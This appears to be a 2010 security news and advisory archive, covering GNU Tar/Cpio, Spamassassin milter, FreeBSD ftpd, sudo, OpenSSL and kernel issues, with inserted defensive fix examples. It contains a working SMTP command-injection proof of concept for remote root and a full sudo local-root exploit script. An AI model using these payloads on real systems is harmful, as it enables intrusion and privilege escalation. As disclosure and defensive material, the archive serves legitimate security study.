Mar 11 2010

Heap-based buffer overflow in GNU Tar and GNU Cpio

I. BACKGROUND

GNU Tar and GNU Cpio are popular programs for managing archive
files. Both programs are included in many Linux distributions. GNU Tar
is commonly used for exchanging source code archives.

Both programs include a client implementation for the remote mag tape
protocol (rmt). This protocol allows accessing a tape device attached
to a remote system via rsh/ssh. It can also be used to
extract/create archive files on another system directly using Tar/Cpio
(although using rmt for accessing remote files is deprecated).

II. DESCRIPTION

The rmt client implementation of GNU Tar/Cpio contains a heap-based
buffer overflow which possibly allows arbitrary code execution.

The vulnerability is in the function rmt_read__ in lib/rtapelib.c:

/* Read up to LENGTH bytes into BUFFER from remote tape connection HANDLE.
   Return the number of bytes read on success, SAFE_READ_ERROR on error. */
size_t
rmt_read__ (int handle, char *buffer, size_t length)
{
  char command_buffer[COMMAND_BUFFER_SIZE];
  size_t status;
  size_t rlen;
  size_t counter;

  sprintf (command_buffer, "R%lu\n", (unsigned long) length);
  if (do_command (handle, command_buffer) == -1
      || (status = get_status (handle)) == SAFE_READ_ERROR)
    return SAFE_READ_ERROR;

  for (counter = 0; counter < status; counter += rlen, buffer += rlen)
    {
      rlen = safe_read (READ_SIDE (handle), buffer, status - counter);
      if (rlen == SAFE_READ_ERROR || rlen == 0)
        {
          _rmt_shutdown (handle, EIO);
          return SAFE_READ_ERROR;
        }
    }

  return status;
}

The function first tells the server how many bytes it wants to
read, using sprintf() and do_command(). Then it reads the number of
bytes the server says are available into the variable status using
get_status(). In the for loop, the function reads status bytes from the
server into the buffer. However, it doesn't check whether status is
actually less than or equal to the length of the buffer given by the
parameter length. So a malicious rmt server can overwrite data on the
heap following the buffer. Successful exploitation of this bug could
possibly lead to arbitrary code execution.
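As an added illustration (not part of the advisory and not GNU Tar's code), the following C program shows the missing bound in a self-contained form. The remote connection is replaced by an in-memory byte stream whose status line is modelled on rmt's "A<count>" success reply, and the server-declared count is checked against the caller's buffer length before a single payload byte is copied. The names fake_conn, fake_read, fake_get_status and rmt_read_bounded are assumptions made for the demonstration.

```c
/* Added example (not from the advisory or from GNU Tar): a bounded variant
 * of the rmt read loop, driven by a simulated connection so it runs offline. */
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <errno.h>

#define SAFE_READ_ERROR ((size_t) -1)

/* Constructed stand-in for the rmt connection: a reply line "A<count>\n"
 * followed by <count> payload bytes, as a server would answer "R<len>". */
struct fake_conn {
    const unsigned char *data;
    size_t len;
    size_t pos;
};

/* Read up to n bytes from the fake connection (stands in for safe_read). */
static size_t fake_read(struct fake_conn *c, char *buf, size_t n)
{
    size_t avail = c->len - c->pos;
    if (n > avail) n = avail;
    memcpy(buf, c->data + c->pos, n);
    c->pos += n;
    return n;
}

/* Parse the status line "A<number>\n" (stands in for get_status). */
static size_t fake_get_status(struct fake_conn *c)
{
    char line[32];
    size_t i = 0;
    for (;;) {
        if (i >= sizeof line - 1) return SAFE_READ_ERROR;   /* overlong line */
        if (fake_read(c, &line[i], 1) != 1) return SAFE_READ_ERROR;
        if (line[i] == '\n') break;
        i++;
    }
    line[i] = '\0';
    if (line[0] != 'A') return SAFE_READ_ERROR;
    char *end;
    errno = 0;
    unsigned long v = strtoul(line + 1, &end, 10);
    if (errno != 0 || end == line + 1 || *end != '\0') return SAFE_READ_ERROR;
    return (size_t) v;
}

/* Bounded read: the server-declared count is validated against the caller's
 * buffer length first. Returns bytes read, or SAFE_READ_ERROR if the server
 * declares more than LENGTH bytes (the check rmt_read__ lacks). */
size_t rmt_read_bounded(struct fake_conn *c, char *buffer, size_t length)
{
    size_t status = fake_get_status(c);
    if (status == SAFE_READ_ERROR) return SAFE_READ_ERROR;
    if (status > length) return SAFE_READ_ERROR;   /* server lies: refuse */

    size_t counter, rlen;
    for (counter = 0; counter < status; counter += rlen) {
        rlen = fake_read(c, buffer + counter, status - counter);
        if (rlen == 0) return SAFE_READ_ERROR;     /* short stream */
    }
    return status;
}

/* Constructed sample replies: a well-behaved one and an oversized one. */
static const unsigned char REPLY_OK[] = "A5\nhello";
static const unsigned char REPLY_OVERSIZE[] = "A64\n";

/* Honest server: 5 bytes declared, 5 delivered into an 8-byte buffer. */
size_t demo_ok(void)
{
    char buf[8];
    struct fake_conn c = { REPLY_OK, sizeof REPLY_OK - 1, 0 };
    size_t n = rmt_read_bounded(&c, buf, sizeof buf);
    return (n == 5 && memcmp(buf, "hello", 5) == 0) ? n : SAFE_READ_ERROR;
}

/* Malicious server: 64 bytes declared for an 8-byte buffer; rejected. */
size_t demo_oversize(void)
{
    char buf[8];
    struct fake_conn c = { REPLY_OVERSIZE, sizeof REPLY_OVERSIZE - 1, 0 };
    return rmt_read_bounded(&c, buf, sizeof buf);
}

int main(void)
{
    printf("honest server: %zu bytes\n", demo_ok());
    printf("oversized reply rejected: %s\n",
           demo_oversize() == SAFE_READ_ERROR ? "yes" : "no");
    return 0;
}
```

The only difference from the vulnerable loop is the comparison of status against length before the copy loop starts; everything the server sends beyond that bound is refused rather than written past the buffer.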

III. EXPLOIT VECTORS

The problem can be exploited when using an untrusted/compromised rmt
server. The impact is fairly low since rmt is rarely used today and
the rmt server is in most cases considered trustworthy.

However, this vulnerability can also be triggered when trying to
extract a tar file with a colon in the filename. In this case, tar
interprets the part before the colon as a hostname (or user@hostname)
and opens an rsh connection to this host. This may also be exploited if
the user uses the aunpack script from atool [1] to extract a tar
file. Many users of GNU Tar or atool don't know that rmt exists and
that tar treats filenames containing a colon differently. So a user
might run tar or aunpack on a file which he has received via email or
downloaded from a web page. Many users enter filenames using bash
auto-completion and thus might not even notice that there is anything
wrong with the filename.

For Cpio, this attack vector does not work since Cpio requires the
option --rsh-command to use rmt. Tar has compiled in the default value
"/usr/bin/rsh".

It is also possible that there are scripts out there which
automatically call Tar to extract a file with a name provided by an
untrusted source. If the script passes the filename with an (absolute
or relative) path or uses the --force-local option, this problem can
be avoided.

Notes on rsh/ssh:

GNU Tar uses /usr/bin/rsh to execute the rmt server implementation
(/usr/bin/rmt) on the server. On most modern Linux systems
/usr/bin/rsh is just a symlink to ssh. So an attempt to exploit this
vulnerability might make ssh ask the user whether to add a new key to
the known_hosts file. This gives users the possibility to cancel the
program and thus prevent successful exploitation. However, the problem
can still be exploited if the attacker has compromised a machine which
is already in the user's known_hosts file or if the user has set
StrictHostKeyChecking to "no" in his ssh configuration.

IV. WORKAROUND

Do not use the integrated rmt client of GNU Tar/Cpio if the rmt server
is untrusted or potentially compromised. Always check that the
filename doesn't contain a colon when extracting tar files or use the
--force-local option.

V. SOLUTION

Upgrade GNU Tar to version 1.23 and GNU Cpio to version 2.11.

Some Linux distributions are going to release upgraded packages
today or in the next few days.

VI. DISCLOSURE TIMELINE

2010/02/12: Vendor and major Linux Distributions notified
2010/03/10: Public disclosure

VII. CREDIT

This vulnerability has been discovered by Jakob Lell from the
TU Berlin computer security working group (AGRS).

http://www.agrs.tu-berlin.de/parameter/en/

A copy of this advisory is also available on the following page:

http://www.agrs.tu-berlin.de/index.php?id=78327

[1] http://www.nongnu.org/atool/

Source


Mar 8 2010

Spamassassin Milter Plugin Remote Root

Spamassassin Milter Plugin Remote Root Zeroday (BTW zerodays lurk in the shadows not HERE) aka the postfix_joker advisory

Logic fuckup?

March 07 2010 // if you read this 10 years later you are definitely
seeking the nice 0days!

Greetz fly out to alex,andi,adize :D
+++ KEEP IT ULTRA PRIV8 +++

Software
+-+-+-+-+
Apache Spamassassin
SpamAssassin is a mail filter which attempts to identify spam using
a variety of mechanisms including text analysis, Bayesian filtering,
DNS blocklists, and collaborative filtering databases.

SpamAssassin is a project of the Apache Software Foundation (ASF).

Postfix
What is Postfix? It is Wietse Venema’s mailer that started life at IBM
research as an alternative to the widely-used Sendmail program.
Postfix attempts to be fast, easy to administer, and secure.
The outside has a definite Sendmail-ish flavor, but the inside is
completely different.

Spamassassin Milter
A little plugin for the Sendmail Milter (Mail Filter) library
that pipes all incoming mail (including things received by rmail/UUCP)
through the SpamAssassin, a highly customizable SpamFilter.

Remote Code Execution Vulnerability
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+

The Spamassassin Milter Plugin can be tricked into executing any command
as the root user remotely.
If spamass-milter is run with the expand flag (-x option) it runs popen()
on a command line that includes the attacker-supplied
recipient (RCPT TO).

From spamass-milter-0.3.1 (-latest) Line 820:

//
// Gets called once for each recipient
//
// stores the first recipient in the spamassassin object and
// stores all addresses and the number thereof (some redundancy)
//

sfsistat
mlfi_envrcpt(SMFICTX* ctx, char** envrcpt)
{
    struct context *sctx = (struct context*)smfi_getpriv(ctx);
    SpamAssassin* assassin = sctx->assassin;
    FILE *p;
#if defined(__FreeBSD__)
    int rv;
#endif

    debug(D_FUNC, "mlfi_envrcpt: enter");

    if (flag_expand)
    {
        /* open a pipe to sendmail so we can do address
           expansion */

        char buf[1024];
        char *fmt="%s -bv \"%s\" 2>&1";

#if defined(HAVE_SNPRINTF)
        snprintf(buf, sizeof(buf)-1, fmt, SENDMAIL, envrcpt[0]);
#else
        /* XXX possible buffer overflow here */ // is this a joke ?!
        sprintf(buf, fmt, SENDMAIL, envrcpt[0]);
#endif

        debug(D_RCPT, "calling %s", buf);

#if defined(__FreeBSD__) /* popen bug - see PR bin/50770 */
        rv = pthread_mutex_lock(&popen_mutex);
        if (rv)
        {
            debug(D_ALWAYS, "Could not lock popen mutex: %s", strerror(rv));
            abort();
        }
#endif

        p = popen(buf, "r"); [1]
        if (!p)
        {
            debug(D_RCPT, "popen failed(%s). Will not expand aliases", strerror(errno));
            assassin->expandedrcpt.push_back(envrcpt[0]);

[1] the vulnerable popen() call.
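An added example (not spamass-milter's code) of the shape the fix takes: popen() hands the formatted string to /bin/sh -c, so a recipient containing `|` becomes a second command. Building an argv and using fork()/execv() instead keeps the recipient as one argument that is never parsed by a shell. The helper names run_capture and expand_recipient are assumptions, and /bin/echo is used as a stand-in for the SENDMAIL -bv invocation so the program runs anywhere.

```c
/* Added example (not from spamass-milter): address expansion without a shell.
 * The recipient is passed as a single argv element; metacharacters in it are
 * plain text to the child. /bin/echo stands in for "sendmail -bv" (assumption). */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/wait.h>

/* Run PROG with the NULL-terminated ARGV, capturing its stdout into OUT.
 * Returns the child's exit status, or -1 on failure. No shell is involved. */
int run_capture(const char *prog, char *const argv[], char *out, size_t out_len)
{
    int fds[2];
    if (out_len == 0 || pipe(fds) == -1) return -1;
    pid_t pid = fork();
    if (pid == -1) { close(fds[0]); close(fds[1]); return -1; }
    if (pid == 0) {
        /* Child: route stdout into the pipe, then exec the program directly. */
        close(fds[0]);
        if (dup2(fds[1], STDOUT_FILENO) == -1) _exit(127);
        close(fds[1]);
        execv(prog, argv);
        _exit(127);                     /* only reached if execv fails */
    }
    close(fds[1]);
    size_t used = 0;
    while (used + 1 < out_len) {
        ssize_t n = read(fds[0], out + used, out_len - used - 1);
        if (n <= 0) break;
        used += (size_t) n;
    }
    out[used] = '\0';
    char scratch[256];                  /* drain anything beyond OUT's capacity */
    while (read(fds[0], scratch, sizeof scratch) > 0) ;
    close(fds[0]);
    int status;
    if (waitpid(pid, &status, 0) == -1) return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}

/* Expand one recipient through PROG with "-bv", the way the milter intends,
 * but with RCPT as an argv element instead of text inside a shell command. */
int expand_recipient(const char *prog, const char *rcpt, char *out, size_t out_len)
{
    char *const argv[] = { (char *) prog, "-bv", (char *) rcpt, NULL };
    return run_capture(prog, argv, out, out_len);
}

/* Constructed recipient taken from the PoC above; under execv it is only text. */
static const char DEMO_RCPT[] = "root+:\"|touch /tmp/foo\"";

/* Runs the demo recipient through /bin/echo; OUT receives the echoed argv. */
int demo_expand(char *out, size_t out_len)
{
    return expand_recipient("/bin/echo", DEMO_RCPT, out, out_len);
}

int main(void)
{
    char out[256];
    int rc = demo_expand(out, sizeof out);
    printf("exit=%d output=%s", rc, out);   /* the pipe never reaches a shell */
    return rc == 0 ? 0 : 1;
}
```

The echoed output contains the literal `|touch /tmp/foo`, and no file is created, because nothing between the milter and the child interprets the string as a command line.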

Remote Root Exploit PoC through postfix
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+

$ nc localhost 25
220 ownthabox ESMTP Postfix (Ubuntu)
mail from: me@me.com
250 2.1.0 Ok
rcpt to: root+:"|touch /tmp/foo"
250 2.1.5 Ok

$ ls -la /tmp/foo
-rw-r--r-- 1 root root 0 2010-03-07 19:46 /tmp/foo

Signed,

Kingcope

Source


Mar 8 2010

As Memory Protections Advance, Exploits Stay a Step Ahead

Despite years of efforts by software security teams at major vendors to harden the operating systems and browsers that are the most common targets of attackers, exploitation of new as well as older vulnerabilities is still simpler than many people might think.

Microsoft, Mozilla, Adobe and even Apple, to some degree, have put in place technologies in their newer products that are designed to make it more difficult for attackers to exploit vulnerabilities, including unknown flaws. However, these technologies, which include DEP, ASLR and SafeSEH, are mitigations, not absolute defenses against exploitation, said Dino Dai Zovi, a researcher and chief scientist at Endgame Systems, in a talk at the RSA Conference here. As effective as some of these technologies can be, they’re not meant to eliminate the possibility of a system being compromised.

“Attack mitigation takes the universe of exploit techniques and narrows it down,” he said. “But preventing the introduction of malicious code isn’t enough to prevent malicious computations.”

Microsoft has been steadily adding memory-protection technologies such as ASLR and DEP to its products over the last few years, and they are now enabled by default in the latest versions of Windows and Internet Explorer. Address Space Layout Randomization (ASLR) is designed to make it more difficult for attackers to overwrite a specific portion of memory by randomizing the location of key areas in a process’s memory. With things in unpredictable locations, it’s much more difficult for attackers to get their data into the right place for an attack.

However, even with ASLR and Data Execution Prevention (DEP) enabled, it’s still possible to exploit vulnerabilities in the most recent versions of IE and Windows. In his talk, Dai Zovi showed a live demonstration in which he exploited the so-called Aurora IE vulnerability on Windows 7 running IE8. This configuration was thought to be immune to such attacks, but Dai Zovi was able to bypass the memory protections by using a combination of several attack techniques chained together. The presence of DEP and ASLR made the attack more difficult, but not impossible.

Dai Zovi said that while his attack worked in this instance, that’s no guarantee that a similar technique would work in another situation.

“Exploitation in the wild that bypasses DEP is pretty rare,” he said. DEP is specifically designed to prevent attackers from forcing applications to execute data from portions of memory that are designated as non-executable.

In fact, Microsoft has acknowledged the limitations of DEP from the beginning, and says that it is simply one of several tools that can help prevent memory corruption attacks.

“DEP presents a hurdle to attackers as they attempt to successfully exploit security vulnerabilities. In some cases, it is possible for an attacker to evade DEP by using an exploitation technique such as return-to-libc. DEP by itself is generally not a robust mitigation. DEP is a critical part of the broader set of exploit mitigation technologies that have been developed by Microsoft such as ASLR, SeHOP, SafeSEH, and /GS. These mitigation technologies complement one another; for example DEP’s weaknesses tend to be offset by ASLR and vice versa. DEP and ASLR used together are very difficult to bypass. The known bypasses that exist have been tied to specific application contexts (such as the IE7 and earlier bypass from Mark Dowd and Alex Sotirov),” Microsoft’s Robert Hensing wrote last year.

But, as Dai Zovi and others have shown, even with these technologies enabled, exploitation is still possible. Attackers have begun using third-party applications to bypass ASLR and DEP on Windows recently. A researcher named Dionysus Blazakis showed in February how he could use a technique called JIT-spraying to exploit a vulnerability in Adobe Flash and bypass both ASLR and DEP. This scenario is not something that Microsoft security engineers would have contemplated or been able to prevent on their end; it’s a result of the complex interactions among applications in production environments, not test labs.

“Systems fail more because of implementation than theory. The real world is complicated,” Dai Zovi said.

Source


Mar 8 2010

FreeBSD and OpenBSD ftpd bug (not exploitable?)

FreeBSD ftpd globbing bug – null pointer dereference ?

Affected FreeBSD Releases
+-+-+-+-+-+-+-+-+-+
FreeBSD 8.0, 6.3 and 4.9

Affected OpenBSD Releases
+-+-+-+-+-+-+-+-+-+
OpenBSD 4.6

Testing Environment
+-+-+-+-+-+-+-+-+-+
FreeBSD localhost.Belkin 8.0-RELEASE FreeBSD 8.0-RELEASE #0: Sat Nov 21
15:48:17 UTC 2009 root@almeida.cse.buffalo.edu:/usr/obj/usr/src/sys/GENERIC i386

Full Description
+-+-+-+-+-+-+-+-+-+
FreeBSD (tested back to 4.9-Release) (and OpenBSD 4.6) has a bug in its
ftpd when handling globbing requests.

My investigation results in this being a null pointer dereference in
popen.c.
I am not sure if this could be a heap overrun, but I don’t think so.

from popen.c:

    /* glob each piece */
    gargv[0] = argv[0];
    for (gargc = argc = 1; argv[argc] && gargc < (MAXGLOBARGS-1); argc++) {
        glob_t gl;
        int flags = GLOB_BRACE|GLOB_NOCHECK|GLOB_TILDE;

        memset(&gl, 0, sizeof(gl));
        gl.gl_matchc = MAXGLOBARGS;
        flags |= GLOB_LIMIT;
[1]     if (glob(argv[argc], flags, NULL, &gl))
            gargv[gargc++] = strdup(argv[argc]);
[2]     else
[3]         for (pop = gl.gl_pathv; *pop && gargc < (MAXGLOBARGS-1);
                 pop++)
                gargv[gargc++] = strdup(*pop);
        globfree(&gl);
    }

At [1] glob() is called. If there's a long directory name (for example "A" x
200) and a request like the one described in "how to repeat the problem"
is sent to the ftpd, it crashes. My assumption is that execution lands in
the else clause [2]: glob doesn't fail but gives back a zeroed-out gl
structure. In [3] there's then no check whether pop is null, so *pop
gets dereferenced, which is a null pointer, and the ftpd instance crashes.

Could someone please shed some light into why glob doesn't fail but
gives a zeroed out structure back?
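An added example (not FreeBSD's popen.c) of the defensive form of the loop at [3]: iterate gl_pathv only after confirming it is non-NULL, so a glob_t that comes back zeroed is treated as "no matches" rather than dereferenced. The helper names glob_count and safe_glob are assumptions; GLOB_LIMIT and gl_matchc are compiled in only where the libc provides them (glibc does not), and the GNU flags GLOB_BRACE/GLOB_TILDE need _GNU_SOURCE on glibc.

```c
/* Added example (not from FreeBSD): NULL-safe traversal of glob() results.
 * Demonstrates the check that is missing at [3] in the popen.c excerpt. */
#ifndef _GNU_SOURCE
#define _GNU_SOURCE          /* GLOB_BRACE / GLOB_TILDE on glibc */
#endif
#include <glob.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define MAXGLOBARGS 1000

/* Count the strings a glob_t holds, returning 0 when gl_pathv is NULL.
 * A zeroed structure (memset(&gl, 0, ...)) therefore yields 0, not a crash. */
size_t glob_count(const glob_t *gl)
{
    size_t n = 0;
    if (gl->gl_pathv == NULL) return 0;
    for (char **pop = gl->gl_pathv; *pop; pop++) n++;
    return n;
}

/* Expand PATTERN into OUT (up to MAX strdup'd strings) and return how many
 * were stored. On glob() failure the pattern itself is stored, as popen.c
 * does; on success the result vector is walked only if it exists. */
size_t safe_glob(const char *pattern, char **out, size_t max)
{
    glob_t gl;
    int flags = GLOB_BRACE | GLOB_NOCHECK | GLOB_TILDE;
    size_t stored = 0;

    memset(&gl, 0, sizeof gl);
#ifdef GLOB_LIMIT                 /* BSD only; glibc has no gl_matchc */
    gl.gl_matchc = MAXGLOBARGS;
    flags |= GLOB_LIMIT;
#endif
    if (glob(pattern, flags, NULL, &gl) != 0) {
        if (max > 0) out[stored++] = strdup(pattern);
    } else if (gl.gl_pathv != NULL) {        /* the check missing at [3] */
        for (char **pop = gl.gl_pathv; *pop && stored < max; pop++)
            out[stored++] = strdup(*pop);
    }
    globfree(&gl);
    return stored;
}

/* Demo 1: a zeroed glob_t, the state the bug report describes. */
size_t demo_zeroed(void)
{
    glob_t gl;
    memset(&gl, 0, sizeof gl);
    return glob_count(&gl);           /* 0, no dereference of NULL */
}

/* Demo 2: a constructed pattern that matches nothing. With GLOB_NOCHECK the
 * pattern itself is returned, so exactly one string comes back. */
size_t demo_nomatch(void)
{
    char *out[4];
    size_t n = safe_glob("/constructed-nonexistent-dir-xyz/*", out, 4);
    for (size_t i = 0; i < n; i++) free(out[i]);
    return n;
}

int main(void)
{
    printf("zeroed glob_t: %zu entries\n", demo_zeroed());
    printf("no-match pattern: %zu entries\n", demo_nomatch());
    return 0;
}
```

Whatever the reason glob() hands back an empty structure, a server loop written this way fails closed (zero arguments) instead of faulting.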

How to repeat the problem
+-+-+-+-+-+-+-+-+-+-+-+-+-+

$ ftp 192.168.2.11
Connected to 192.168.2.11.
220 localhost.Belkin FTP server (Version 6.00LS) ready.
Name (192.168.2.11:nr): kcope
331 Password required for kcope.
Password:
230 User kcope logged in.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> mkdir WWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWW
257 "WWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWW" directory created.
ftp> ls {W*/../W*/../W*/../W*/../W*/../W*/../W*/}
200 PORT command successful.
---snip---

on the other side:

---snip---
0x282261e5 in read () at read.S:3
3       RSYSCALL(read)
Current language: auto; currently asm
(gdb) c
Continuing.

Program received signal SIGSEGV, Segmentation fault.
0x0805622c in getline ()
(gdb) i r
eax            0x0        0
ecx            0x0        0
edx            0x0        0
ebx            0xbfbfd911 -1077946095
esp            0xbfbfba70 0xbfbfba70
ebp            0xbfbfcc08 0xbfbfcc08
esi            0x1        1
edi            0xbfbfcbf4 -1077949452
eip            0x805622c  0x805622c
eflags         0x10293    66195
cs             0x33       51
ss             0x3b       59
ds             0x3b       59
es             0x3b       59
fs             0x3b       59
gs             0x1b       27
(gdb) x/10i $eip
0x805622c : mov    (%edx),%eax
0x805622e : setle  %cl
0x8056231 : mov    %ecx,%esi
0x8056233 : test   %eax,%eax
0x8056235 : je     0x8056281
0x8056237 : test   %cl,%cl
0x8056239 : je     0x8056281
0x805623b : mov    %edx,%ebx
0x805623d : mov    0xffffee7c(%ebp),%edx
0x8056243 : lea    0xffffee90(%ebp,%edx,4),%edi
(gdb) i f
Stack level 0, frame at 0xbfbfcc10:
 eip = 0x805622c in getline; saved eip 0x805047b
 called by frame at 0xbfbfcc14
 Arglist at 0xbfbfcc08, args:
 Locals at 0xbfbfcc08, Previous frame's sp is 0xbfbfcc10
 Saved registers:
  ebx at 0xbfbfcbfc, ebp at 0xbfbfcc08, esi at 0xbfbfcc00, edi at 0xbfbfcc04,
  eip at 0xbfbfcc0c
(gdb)

Testing program:

---snip---

/* headers required by the calls below */
#include <stdio.h>
#include <string.h>
#include <glob.h>

#define MAXUSRARGS 100
#define MAXGLOBARGS 1000

void do_glob() {
    glob_t gl;
    char **pop;

    /* same brace/parent-dir pattern as in the ftp session */
    char buffer[256];
    strcpy(buffer, "{A*/../A*/../A*/../A*/../A*/../A*/../A*}");

    int flags = GLOB_BRACE|GLOB_NOCHECK|GLOB_TILDE;
    memset(&gl, 0, sizeof(gl));
    gl.gl_matchc = MAXGLOBARGS;
    flags |= GLOB_LIMIT;
    if (glob(buffer, flags, NULL, &gl)) {
        printf("GLOB FAILED!\n");
        return;                /* void function: no value returned */
    }
    else
    // for (pop = gl.gl_pathv; pop && *pop && 1 < (MAXGLOBARGS-1);
    for (pop = gl.gl_pathv; *pop && 1 < (MAXGLOBARGS-1);
         pop++) {
        printf("glob success");
        return;
    }
    globfree(&gl);
}

int main(int argc, char **argv) {
    do_glob();
    do_glob();
    return 0;
}
---snip---

05 March 2010
/kingcope

Source


Mar 4 2010

‘Severe’ OpenSSL vuln busts public key crypto

Computer scientists say they’ve discovered a “severe vulnerability” in the world’s most widely used software encryption package that allows them to retrieve a machine’s secret cryptographic key.

The bug in the OpenSSL cryptographic library is significant because the open-source package is used to protect sensitive data in countless applications and operating systems throughout the world. Although the attack technique is difficult to carry out, it could eventually be applied to a wide variety of devices, particularly media players and smartphones with anti-copying mechanisms.

“Wherever you need to verify the origin of a piece of software or a piece of information, those building blocks come in handy,” said Karsten Nohl, an independent security researcher who in unrelated attacks has broken encryption in widely used smartcards and cordless phones. “The OpenSSL library provides much more than just SSL.”

The scientists, from the University of Michigan’s electrical engineering and computer science departments, said the bug is easily fixed by applying cryptographic “salt” to an underlying error-checking algorithm. The additional randomization would make the attack unfeasible.

An OpenSSL official, who asked that his name not be published, said engineers are in the process of pushing out a patch and stressed the attack is difficult to carry out in real-world settings.

The university scientists found that they could deduce tiny pieces of a private key by injecting slight fluctuations in a device’s power supply as it was processing encrypted messages. In a little more than 100 hours, they were able to feed the device enough “transient faults” that they were able to assemble the entirety of its 1024-bit key.

“This is probably not as much of a threat to a server system as it is to a consumer device,” said Todd Austin, one of the scientists who devised the attack. “The place where this would be more applicable would be if you want to attack a Blu-ray player (where) you have an environment where someone is giving you a device that has a private key to protect intellectual property and you have physical access to the device.”

Servers, by contrast, would be much harder to attack because they are generally located in places that prevent people from manipulating their power supply. But that doesn’t mean they’re immune to such exploits. In events where a machine was overheating or otherwise experiencing power fluctuations, the vulnerability will cause servers to leak secret data that could be intercepted by attackers.

The scientists are also experimenting with the possibility of exploiting the bug using lasers or natural radiation sources, they said.

The attack is enabled by what the researchers described as a “severe vulnerability” in the OpenSSL innards that carry out authentication based on the RSA public key encryption algorithm. It resides in the so-called fixed window exponentiation algorithm of the open-source crypto library, which is used when errors arise. By triggering a single-bit error in a multiplication operation, the scientists were able to force OpenSSL to divulge 4 bits of the secret key.

Once they gathered about 8,800 malformed messages from the targeted device, they fed the data into an 81-machine cluster of 2.4 GHz Pentium-4 systems running a custom-designed algorithm. They applied the technique to an embedded hardware device consisting of a Sparc processor running a Linux operating system and were able to extract its 1024-bit private key in 104 hours.

The researchers said it may be possible to apply the method to other crypto libraries, such as one offered by the Mozilla Foundation.

Source


Mar 1 2010

Todd Miller Sudo local root exploit discovered by Slouching

From: Kingcope
Date: Tue, 02 Mar 2010 00:08:44 +0100

Just for the record.

#!/bin/sh
# Tod Miller Sudo 1.6.x before 1.6.9p21 and 1.7.x before 1.7.2p4
# local root exploit
# March 2010
# automated by kingcope
# Full Credits to Slouching
echo Tod Miller Sudo local root exploit
echo by Slouching
echo automated by kingcope
if [ $# != 1 ]
then
echo "usage: ./sudoxpl.sh "
exit
fi
cd /tmp
cat > sudoedit << _EOF
#!/bin/sh
echo ALEX-ALEX
su
/bin/su
/usr/bin/su
_EOF
chmod a+x ./sudoedit
sudo ./sudoedit $1

cheers,
kingcope

Source


Feb 26 2010

PHP 5.2.13 addresses security holes

An update which fixes around 40 bugs is available for the PHP 5.2 development branch. Version 5.2.13 comes highly recommended for all PHP 5.2.x users, as it includes a number of security-related fixes. These include a bug when validating the safe_mode configuration variable in the tempnam() function (which arises when the path does not end in /). An open_basedir/safe_mode bypass vulnerability in the session extension has also been fixed.

More details about the release, including other significant changes, can be found in the release announcement and change log. PHP 5.2.13 is available to download from the project’s site.

The current PHP development branch is PHP 5.3, for which version 5.3.1 has been available since November 2009. A third release candidate for PHP 5.3.2 was released on the 23rd of February.

Source


Feb 25 2010

FBI outlines three components of cyber-risk

To make better cybersecurity-related decisions a senior FBI official recommends considering a simple algebraic equation—risk = threat x vulnerability x consequence—rather than solely focusing on threat vectors and actors.

Each factor is important, Steven Chabinsky, deputy assistant director at the FBI’s Cyber Division, said today. Chabinsky spoke on a panel at the Armed Forces Communications and Electronics Association Homeland Security Conference in Washington.

Nation-states that commit espionage, terrorist organizations, individuals interested in using the Internet as an attack tool and criminal syndicates are the types of attackers most likely to target computer systems in both the public and private sectors, he said. Threat vectors on which the FBI is focused include remote access and intrusion, supply chain vulnerabilities, proximate or close access threats, and insider access threats, he said.

Chabinsky said the risk model is compelling because risk drops to zero if any of those three elements or variables is zero. He said the risk model is the first place he goes when he needs to step back strategically.

“Unfortunately, we haven’t gotten to the point where I feel we can maintain at zero any one of those element so we have to constantly figure out as an organization how we are we driving down each of those,” he said.

He added, “If you look through the risk model you’ll find that you have opportunities on the threat vulnerability and consequence management side, and you have to find your partners so that you could work together.”

Source


Feb 24 2010

Execution possible in non-executable mappings in recent 2.6 kernels

Hi Dave & list:

I’m writing to report a bug in recent vanilla kernels regarding the
ability to execute in non-executable pages on SPARC. I’m no SPARC
expert, but I’ll try to explain as best I can the problem and make
myself available for debugging/testing any fixes.

I have 4 sparc systems currently, a Netra T1, an Ultra 10, a Sunfire
V210, and a Blade 2500. The first two systems run the latest 2.4
kernels and experience no problems. The second two systems run recent
2.6 kernels (2.6.31 and 2.6.32) and both utilize the Cheetah+ MMU. Both
of these systems running the recent 2.6 kernels exhibit the problem.

I’ve provided two simple testcases that illustrate the problem. Either
run them in a loop or just multiple times — eventually instead of
receiving a segfault (as it should every time for attempting to execute
on the stack, which is non-executable by default per ABI) the shellcode
I’ve set up on the stack will execute without problems. In the first
testcase I haven’t set up enough code to perform a return from the
function pointer, so you see the varied signals when an instruction
fetch is attempted on the 2nd instruction (made up of whatever
happened to be located on the stack). In the second case I set up the
proper ret/restore and the program is able to exit cleanly.

I’m willing to do anything to help debug the problem, but I thought it
would
be wiser to report it first in case anyone had any immediate ideas on
what the problem could be. I figured it would also help in being able
to debug the issue more effectively, given its seemingly somewhat-random
nature.

Please keep the PaX team and myself CC’d as we’re not subscribed to the
list.

Thanks for your help,
-Brad

cat /proc/self/maps output (showing the stack non-executable):
00010000-00014000 r-xp 00000000 08:02 1769474 /bin/cat
00024000-00026000 rwxp 00004000 08:02 1769474 /bin/cat
